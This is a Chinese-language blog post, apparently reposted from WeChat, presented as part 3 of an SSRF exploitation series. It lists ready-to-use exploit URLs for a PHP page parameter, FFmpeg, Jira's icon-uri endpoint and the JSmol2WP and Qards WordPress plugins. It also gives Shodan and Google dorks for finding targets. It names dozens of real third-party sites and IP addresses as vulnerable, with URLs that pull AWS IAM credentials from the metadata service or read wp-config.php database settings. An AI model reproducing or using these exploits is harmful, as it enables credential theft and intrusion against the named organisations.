SSRF-服务器端请求伪造(类型和利用方法)第3部分

4.实例

https://robert-brook.com/parliament/index.php?page=http://www.parliament.uk/business/news/2019/parliamentary-news-2019/this-week-in-the-commons-friday-25-january-2019/

在这里,页面参数获取外部资源并显示其内容。

SSRF到XSS

https://robert-brook.com/parliament/index.php?page=http://brutelogic.com.br/poc.svg

SSRF-服务器端请求伪造(类型和利用方法)第3部分_第1张图片

读取本地文件

https://robert-brook.com/parliament/index.php?page=file:///etc/passwd

SSRF-服务器端请求伪造(类型和利用方法)第3部分_第2张图片

当您尝试其他URL(如dict)时,会出错

警告:file_get_contents():无法找到包装器“dict” - 你是否忘记在配置PHP时启用它。

这表示未启用DICT URL结构

FFMPEG中的SSRF

读取本地文件
Demo
https://youtu.be/OQBZ__L23KU

易受攻击的站点-

https://www.onlinevideoconverter.com/
https://www.files-conversion.com/

Repo链接:https://github.com/neex/ffmpeg-avi-m3u-xbin

SSRF在广泛使用的插件和CMS中的应用

Jira的SSRF
Jira版本号低于7.3.5正遭受SSRF的困扰

https:///plugins/servlet/oauth/users/icon-uri?consumerUri=…

SSRF-服务器端请求伪造(类型和利用方法)第3部分_第3张图片

在Shodan有4万多个JIRA站点。你可以利用下面的dork

X-AUSERNAME: anonymous
X-AUSERNAME: anonymous org:"Amazon.com"  -- For aws
X-AUSERNAME: anonymous org:"Microsoft Azure" -- For Azure
X-AUSERNAME: anonymous org:"google"  -- For Google

现在让我们看看一些易受攻击的站点

https://jira.majesco.com/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
https://jira.intellectdesign.com/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
https://team.asg.com/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
https://jira.magnitude.com/https://tickets.metabrainz.org/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
https://support.eu.evertz.com/jira/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
https://jira.dhis2.org/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
https://jira.vectormediagroup.com/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/ -- Aws Details 
https://mattel.cprime.com/jira/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
https://www.mfjira.io/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
http://adoptivefam.org/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
https://jira.iea-dpc.org/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
https://jira.fellowshipchurch.com:8443/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
https://jira.soleus.nu/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
http://jira.succraft.com:8080/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
https://tickets.metabrainz.org/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
http://support.make-my-day.co.nz/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
http://52.202.112.34/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/meta-data/iam/security-credentials/SystemsManagerRole -- Aws Details
https://jira.canallabs.fr/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/meta-data/profile -- Aws Details
http://54.247.191.19/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/meta-data -- Aws Details
http://52.22.123.239/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/meta-data -- Aws Details
http://52.22.123.239/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance -- Aws Details
https://devops.deviate.net.nz/projects/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance -- Aws Details
https://52.73.101.120/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/meta-data/iam/security-credentials/BitbucketRole -- Aws Details

这是我发现的一些易受攻击的网站

JSmol2WP Wordpress插件中的SSRF

低于1.07的JSmol2WP版本具有未经身份验证的服务器端请求伪造

http://localhost:8080/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php

Dork -

inurl:wp-content/plugins/jsmol2wp

SSRF-服务器端请求伪造(类型和利用方法)第3部分_第4张图片

易受攻击的网站

https://www.vivelab12.fr/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php -- DB details
http://thasso.com/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=https://google.com -- Fetch google.com
http://www.ch.ic.ac.uk/rzepa/blog/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php -- DB details

Qards Wordpress插件中的SSRF

Qards容易受到服务器端请求伪造(SSRF)的攻击

http://target/wp-content/plugins/qards/html2canvasproxy.php?url=http://google.com

Dork-

inurl:wp-content/plugins/qards

SSRF-服务器端请求伪造(类型和利用方法)第3部分_第5张图片

易受攻击的网站 -

http://www.horlovia-chemicals.ch/wordpress/wp-content/plugins/qards/html2canvasproxy.php?url=http://google.com
https://vfsgroup.com.au/wp-content/plugins/qards/html2canvasproxy.php?url=http://google.com
https://mrgoatygelato.com.au/wp-content/plugins/qards/html2canvasproxy.php?url=http://google.com
https://arturolopezvalerio.com/wp-content/plugins/qards/html2canvasproxy.php?url=http://google.com
https://hooverwellness.com/wp-content/plugins/qards/html2canvasproxy.php?url=http://google.com

HTML到PDF转换的SSRF

易受攻击的网站 -

https://pdfcrowd.com/#convert_by_input 
https://convertio.co/html-pdf/

SSRF-服务器端请求伪造(类型和利用方法)第3部分_第6张图片

Ssrf.html的内容

">
"> -- to know the path and some times to 

以上发布的所有这些网站只是为了让您练习,作者不对任何滥用信息负责。

 

 

转自:https://mp.weixin.qq.com/s/fNQ-fsGJUlK2nWVBKI-boA

你可能感兴趣的:(信安)